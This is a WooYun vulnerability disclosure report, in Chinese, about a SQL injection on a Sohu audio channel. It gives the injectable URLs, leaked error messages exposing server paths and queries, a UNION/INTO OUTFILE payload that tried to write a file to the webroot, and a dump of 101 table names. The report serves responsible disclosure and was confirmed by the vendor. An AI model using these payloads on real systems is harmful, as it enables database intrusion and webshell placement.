漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025506
漏洞标题:搜狐某频道注入一个
相关厂商:搜狐
漏洞作者: 逆雪寒
提交时间:2013-06-09 10:29
修复时间:2013-07-24 10:29
公开时间:2013-07-24 10:29
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-09: 细节已通知厂商并且等待厂商处理中
2013-06-09: 厂商已经确认,细节仅向厂商公开
2013-06-19: 细节向核心白帽子及相关领域专家公开
2013-06-29: 细节向普通白帽子公开
2013-07-09: 细节向实习白帽子公开
2013-07-24: 细节向公众公开
简要描述:
SQL注入~~老问题了。。
详细说明:
找到 http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf 这个地址
名字似乎是 set cookie ... 习惯问题。。就单了 ' 如下:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdf'' and t1.product_name=t2.product_name' at line 1 on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql select t1.audio_url,t2.product_name,t1.sub_product_name,t2.product_id,t1.theorder,t1.sub_product_id from t_sub_product t1,t_product t2 where t1.sub_product_id='asdf'' and t1.product_name=t2.product_name
哇 路径爆了~~ SQL似乎也给外部影响了。。一个注入就这样诞生了
上工具吧。。。
最后还试了试 outfile ...
http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20'
结果如下:
Error 1045: Access denied for user 'wcms_tsw'@'192.168.%' (using password: YES) on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql SELECT t1.thevalue,t1.user_type,t1.thedate from t_user_info t1,t_user t2 where t2.user_name='d' and t1.user_id=t2.user_id union all select "xxddoo",2,3 INTO OUTFILE "/mfs/wwwroot/ting/send/nixuehan.html"-- '' and t1.user_id=t2.user_id
不错~~ 木有 file 权限。。 这个做的挺好。。否则可能拿SHELL了。。
漏洞证明:
Database: tsw
[101 tables]
+----------------------------------+
| customer |
| passport_temp |
| t_adinfo |
| t_android_catagory |
| t_android_channel |
| t_android_channel_log |
| t_android_comm |
| t_android_log |
| t_android_product |
| t_android_sub_product |
| t_android_user_favorite |
| t_audition_currentday_log |
| t_audition_log |
| t_audition_log_log |
| t_audition_log_log_before_201208 |
| t_award_info_for_monthly_user |
| t_baoyue_mobile_online |
| t_baoyue_month_send_info |
| t_blog |
| t_book_folder |
| t_book_folder_info |
| t_card_order_log |
| t_card_type |
| t_card_type_bak |
| t_client_adv |
| t_client_adv_clicklog |
| t_client_adv_showlog |
| t_client_audition_log |
| t_client_channel |
| t_client_channel_catalog |
| t_client_channel_catalog_product |
| t_client_channel_product |
| t_client_feedback |
| t_client_link |
| t_client_parameter |
| t_client_pwd_log |
| t_client_search_log |
| t_client_type |
| t_client_user |
| t_client_user_fancy |
| t_code |
| t_code_200yueka |
| t_code_50yueka_10jika |
| t_corporation |
| t_cpname_month |
| t_date_dimension |
| t_favorite_log |
| t_iphone_audition_log |
| t_iphone_channel |
| t_iphone_login_submit_log |
| t_iphone_logined_info |
| t_iphone_order_create_log |
| t_iphone_order_result_log |
| t_mobile_segment_info |
| t_mt_month_log |
| t_mtry_listen_count |
| t_order_pay_log |
| t_pay_bank |
| t_pay_bank_log |
| t_pay_charge_log |
| t_pay_forbook_process_log |
| t_pay_mobileno_quit |
| t_pay_recharge_log |
| t_pay_rechargemode |
| t_pay_sms_log |
| t_pc_download |
| t_product |
| t_product_adinfo |
| t_product_ding |
| t_product_type |
| t_record_cart_log |
| t_record_prepay_log |
| t_record_prepay_product_info |
| t_rq_top |
| t_sms_content_info |
| t_sms_gwid_oid_info |
| t_stat_login_personcount |
| t_stat_m_month_info |
| t_stat_nlogin_personcount |
| t_stat_product |
| t_stat_search |
| t_stat_stry_listen_count |
| t_stat_ting_income_register_info |
| t_stat_ting_sub_product_info |
| t_stat_trylisten_personcount |
| t_sub_product |
| t_try_listen_count |
| t_tsw_sms_log |
| t_user |
| t_user_info |
| t_user_info_log |
| t_user_info_monthly |
| t_user_product_bind_info |
| t_user_product_info |
| t_user_zhubo_info |
| t_wap_down_log |
| t_wap_log |
| t_wo_folder_info |
| t_zhubo_renwu |
| t_zhubo_zizhi_text |
| t_zhubo_zizhi_upload |
+----------------------------------+
修复方案:
搜狐开发们比我懂
版权声明:转载请注明来源 逆雪寒@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-06-09 10:59
厂商回复:
感谢对搜狐安全关注
最新状态:
暂无